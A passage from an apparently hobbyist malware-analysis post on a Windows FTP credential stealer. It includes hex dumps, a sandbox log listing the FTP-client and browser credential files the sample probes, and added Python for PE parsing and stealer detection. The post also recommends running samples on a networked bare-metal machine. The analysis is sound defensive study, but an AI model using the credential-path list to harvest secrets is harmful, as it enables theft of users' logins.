↑this suggests that you should reverse it by breaking the crypter first.
I don't have much time to play with this, so let's run it & see the evil acts.
Behavior Analysis
So friends, if you have an old PC, just install Windows XP on it,
and then install Wireshark, Regshot & Process Explorer so
you can analyze how malware works!
Do not depend on any VM environment for testing malware,
since recent malware is compiled with code to detect VMs.
This is based on my personal experience: without VM
simulation you'll get much more data than those who use a VM.
If you do daily work in a service center, please
propose to your boss to prepare a cheap junk PC for this
purpose :-)
For the setup, use the basic installation of WinXP with
Java, Adobe and IE; the older the versions, the better.
Then back up the whole hard disk with Norton Ghost or G4L,
to be restored after every test run.
The software installed is as in my junk PC/RAT screenshot below:
↑This is how I tested this "mess". See the marked parts; they are the software
I explained before, plus some shortcuts for taking snapshots (I use ONLY mspaint + notepad),
with a full intranet connection + a USB drive attached (for saving data).
:-) Who says analyzing malware is difficult? It's simple, isn't it?
So I just ran contacts.exe as in the pic above; it self-deleted,
copied + executed KB0077165.exe with a CMD command,
all of a sudden stopped, and then the NEW malicious file's process started..↓
If we look carefully at the details, it was started from the %Temp% path↓
If we look in %Temp%, there were files dropped by this malware↓
This malware also creates threads via kernel.dll as per the snapshot below:
This suggests it runs threaded as a service. Let's find out more about how it goes below:
The newly downloaded file itself has the details below:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 F1 B6 E2 5C B5 D7 8C 0F B5 D7 8C 0F B5 D7 8C 0F ................
0090 36 DF 83 0F B0 D7 8C 0F 36 DF D1 0F B8 D7 8C 0F 6.......6.......
00A0 B5 D7 8D 0F EA D7 8C 0F 3B DF D3 0F B8 D7 8C 0F ........;.......
00B0 36 DF D0 0F B4 D7 8C 0F 3B DF EC 0F B8 D7 8C 0F 6.......;.......
00C0 36 DF D2 0F B4 D7 8C 0F 36 DF D6 0F B4 D7 8C 0F 6.......6.......
00D0 52 69 63 68 B5 D7 8C 0F 00 00 00 00 00 00 00 00 Rich............
00E0 50 45 00 00 4C 01 05 00 36 A9 81 3F 00 00 00 00 PE..L...6..?....
00F0 00 00 00 00 E0 00 02 01 0B 01 08 00 00 60 02 00 .............`..
0100 00 10 01 00 00 00 00 00 C7 11 00 00 00 10 00 00 ................
: : :
MD5: dde1d5cfed7d5646239aed75c0cd0add
Size: 196.0 KB ( 200704 bytes )
Name: exp2.tmp.exe
block 0x40
type EXEC (Executable file)
os windows
arch i386
bits 32
endian little
Entry Point: 0x11c7
Compile Time: 0x3F81A936 [Mon Oct 06 17:41:10 2003 UTC]
Compiler Trace: MS Visual C++
Sections:
.text 0x1000 0x25052 155648
.rdata 0x27000 0x9d4 4096
.data 0x28000 0x100418 4096
.rsrc 0x129000 0x67a0 28672
//Fake MS Product Attributes:
LangID: 040904B0
LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
InternalName: Eudcedit
FileVersion: 5.2.3790.3959 (srv03_sp2_rtm.070216-1710)
CompanyName: Microsoft Corporation
ProductName: Microsoft\xae Windows\xae Operating System
ProductVersion: 5.2.3790.3959
FileDescription: Private Character Editor
OriginalFilename: EUDCEDIT.EXE
//Full Registry Activity...(incl. Deletion...)
ADVAPI32.dll.RegCloseKey Hint[395]
ADVAPI32.dll.RegSetValueExW Hint[442]
ADVAPI32.dll.RegQueryInfoKeyW Hint[426]
ADVAPI32.dll.RegDeleteValueW Hint[405]
ADVAPI32.dll.RegEnumValueW Hint[412]
ADVAPI32.dll.RegEnumKeyExW Hint[409]
ADVAPI32.dll.RegDeleteKeyW Hint[403]
ADVAPI32.dll.RegCreateKeyExW Hint[400]
ADVAPI32.dll.RegOpenKeyExW Hint[421]
// interesting strings...
.text:0040B554 00000779 C vo8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:0041172C 00000177 C o8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho.text:0041B0A4 000000DD C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho3\a
.text:0041C984 00000626 C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:00425BDC 00000477 C 8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho
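A minimal PE header reader run over the two hex dumps above, contacts.exe and exp2.tmp.exe (an added example; not the author's tooling). It rebuilds bytes from rows of the form "OFFSET 16-hex-bytes ASCII", follows e_lfanew to the PE signature and reads the fields the post quotes: machine, section count, compile timestamp, linker version and entry point. Rows that are not present are zero-filled, and a field that lies beyond the dumped bytes comes back as None, which is what happens for the image base of the second dump because that listing stops at offset 0x100. For the second file only the rows the parser actually reads are embedded.

```python
import re
import struct
from datetime import datetime, timezone

# Rows copied from the post: contacts.exe (complete dump as shown above).
CONTACTS_EXE_DUMP = """
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 BF 0F C2 50 00 00 00 00 PE..L......P....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 46 00 00 ...........2.F..
00A0 00 94 01 00 00 00 00 00 00 10 00 00 00 10 00 00 ................
00B0 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 .p....@.........
"""
# exp2.tmp.exe: only the rows the parser reads; the gaps are zero-filled.
EXP2_TMP_EXE_DUMP = """
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ................
00E0 50 45 00 00 4C 01 05 00 36 A9 81 3F 00 00 00 00 PE..L...6..?....
00F0 00 00 00 00 E0 00 02 01 0B 01 08 00 00 60 02 00 .............`..
0100 00 10 01 00 00 00 00 00 C7 11 00 00 00 10 00 00 ................
"""

ROW_RE = re.compile(r"^\s*([0-9A-Fa-f]{4})((?:\s+[0-9A-Fa-f]{2}){16})")


def parse_hexdump(text):
    """Rebuild a byte buffer from dump rows; the ASCII column is ignored and
    offsets that no row covers stay zero."""
    buf = bytearray()
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue                      # separator rows such as ': : :'
        off = int(m.group(1), 16)
        data = bytes.fromhex("".join(m.group(2).split()))
        if len(buf) < off + len(data):
            buf.extend(b"\0" * (off + len(data) - len(buf)))
        buf[off:off + len(data)] = data
    return buf


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0] if off + 2 <= len(buf) else None


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0] if off + 4 <= len(buf) else None


def parse_pe(buf):
    """Read the header fields the post quotes. A field beyond the dumped
    bytes comes back as None instead of raising."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = u32(buf, 0x3C)                                  # e_lfanew
    if pe is None or buf[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    ts = u32(buf, pe + 8)
    opt = pe + 24                                        # optional header start
    return {
        "e_lfanew": pe,
        "machine": u16(buf, pe + 4),                     # 0x14c = i386
        "sections": u16(buf, pe + 6),
        "timestamp": ts,
        "compile_time": (datetime.fromtimestamp(ts, timezone.utc)
                         .strftime("%a %b %d %H:%M:%S %Y UTC") if ts is not None else None),
        "optional_magic": u16(buf, opt),                 # 0x10b = PE32
        "linker_version": (buf[opt + 2], buf[opt + 3]) if opt + 4 <= len(buf) else None,
        "entry_point": u32(buf, opt + 16),               # AddressOfEntryPoint (RVA)
        "image_base": u32(buf, opt + 28),
    }


if __name__ == "__main__":
    for name, dump in (("contacts.exe", CONTACTS_EXE_DUMP), ("exp2.tmp.exe", EXP2_TMP_EXE_DUMP)):
        print(name, parse_pe(parse_hexdump(dump)))
```

Two things stand out when the fields are read this way: contacts.exe carries a linker version of 2.50 next to a compile stamp of December 2012, which does not fit the "MS Visual C++" trace and supports the crypter suspicion, while exp2.tmp.exe reports linker 8.0 with a 2003 stamp, consistent with a dropped payload built long before this campaign.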
What kind of data has been stolen??
What this file did was shocking: it was trying to open/load autoexec.bat & the configuration
file of every internet-account related piece of software, as detected in the list below:
c:\autoexec.bat [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID [Open File Attempt Detected]
C:\WINDOWS\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Program Files\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\WINDOWS\32BitFtp.ini [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\Client Hash [Open File Attempt Detected]
Well, this explains how credentials got stolen:
the saved credentials of every version of the well-known FTP clients (FlashFXP 3/4, FileZilla, ExpanDrive, CoffeeCup, 32BitFtp and so on) and autoexec.bat
were grabbed, with every profile root (All Users, the user's Application Data and Local Settings) swept for each one.
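A small detector for exactly this behaviour, added here as an example (mine, not code from the original post or from the sandbox that produced the log): it parses lines in the sandbox's "[Open File Attempt Detected]" format, maps each path to the FTP client whose credential store it is, records which profile roots were swept, and flags the sample once stores of several different clients are probed in one run. The sample lines are constructed from the log above plus one benign path; the client file patterns and the threshold are my assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: a few lines in the sandbox's "[Open File Attempt
# Detected]" format (copied from the log above; the doubled backslash is the
# sandbox's placeholder for the user name) plus one benign path.
SAMPLE_LOG = r"""
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\WINDOWS\32BitFtp.ini [Open File Attempt Detected]
C:\WINDOWS\system32\kernel32.dll [Open File Attempt Detected]
"""

LINE_RE = re.compile(r"^(?P<path>.+?) \[Open File Attempt Detected\]$")

# Saved-credential stores of the FTP clients seen in the log (patterns are
# mine, matched case-insensitively on the tail of the path).
CREDENTIAL_STORES = {
    "FlashFXP":   re.compile(r"\\FlashFXP\\\d+\\(Sites|Quick|History)\.dat$", re.I),
    "FileZilla":  re.compile(r"\\FileZilla\\(sitemanager|recentservers|filezilla)\.xml$", re.I),
    "ExpanDrive": re.compile(r"\\ExpanDrive\\drives\.js$", re.I),
    "CoffeeCup":  re.compile(r"\\SharedSettings(_\d+_\d+_\d+)?\.(ccs|sqlite)$", re.I),
    "32BitFtp":   re.compile(r"\\32BitFtp\.ini$", re.I),
}


def parse_open_attempts(log_text):
    """Return the paths of all '[Open File Attempt Detected]' lines."""
    paths = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            paths.append(m.group("path"))
    return paths


def classify(path):
    """Name of the FTP client whose credential store `path` is, or None."""
    for client, pattern in CREDENTIAL_STORES.items():
        if pattern.search(path):
            return client
    return None


def profile_scope(path):
    """Which profile root a probe targeted. Order matters: the 'All Users'
    path also contains 'Application Data'."""
    low = path.lower()
    if "\\all users\\" in low:
        return "All Users"
    if "\\local settings\\" in low:
        return "Local Settings"
    if "\\application data\\" in low:
        return "Application Data"
    return "system"


def summarize(log_text):
    """Map each FTP client to the set of credential files probed for it."""
    hits = defaultdict(set)
    for path in parse_open_attempts(log_text):
        client = classify(path)
        if client:
            hits[client].add(path.rsplit("\\", 1)[-1].lower())
    return dict(hits)


def probed_scopes(log_text):
    """Profile roots swept while looking for credential stores."""
    return {profile_scope(p) for p in parse_open_attempts(log_text) if classify(p)}


def verdict(summary, threshold=2):
    """One client touching its own store is normal; a sweep across the stores
    of several different clients in one process is stealer behaviour."""
    return len(summary) >= threshold


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    for client, files in sorted(s.items()):
        print(f"{client:10s} {sorted(files)}")
    print("scopes swept:", sorted(probed_scopes(SAMPLE_LOG)))
    print("credential-stealer behaviour:", verdict(s))
```

The threshold is the point: FileZilla opening sitemanager.xml is normal, but one process opening FlashFXP, FileZilla, ExpanDrive, CoffeeCup and 32BitFtp stores across all three profile roots is not, and that is what a sandbox or EDR rule should key on rather than any single file name.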
Registry Activity
These are the registry values read. All of them are values Windows itself reads while a process starts up (the Software Restriction Policy check via Safer\CodeIdentifiers\TransparentEnabled, Session Manager, Setup and Terminal Server flags, CTF and keyboard-layout initialisation), so they are sandbox noise rather than malware logic:
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
It also added the keys below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR, and
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
with the following values:
HWID: 7B 38 38 45 38 35 31 37 37 2D 42 44 38 38 2D 34 33 45 34 2D 39 32 32 33 2D 39 39 45 43 38 34 42 31 33 38 34 42 7D (that is ASCII for {88E85177-BD88-43E4-9223-99EC84B1384B}, a GUID-shaped per-host identifier parked under a bogus WinRAR key; an HWID value there is a usable host indicator), and
C:\Documents and Settings\\My Documents (the Personal value is just the My Documents path that the shell folder API maintains, nothing malicious by itself)
The malware also read and took your IE data (cookies, history and the Temporary Internet Files cache),
as traced in the mutexes below (these are the WinINet cache-container mutexes, with "!" standing in for "\"):
//Read IE internet history...
0x4ac c:!documents and settings!user!cookies!
0x4ac c:!documents and settings!user!local settings!history!history.ie5!
0x4ac c:!documents and settings!user!local settings!temporary internet files!content.ie5!
The sandbox also reported the entry below as a backdoor service:
Bind to Host: localhost
ServiceName: SERVICES_ACTIVE_DATABASE
Port: (MACHINE_DNS_SERVER) TCP/53 (DNS)
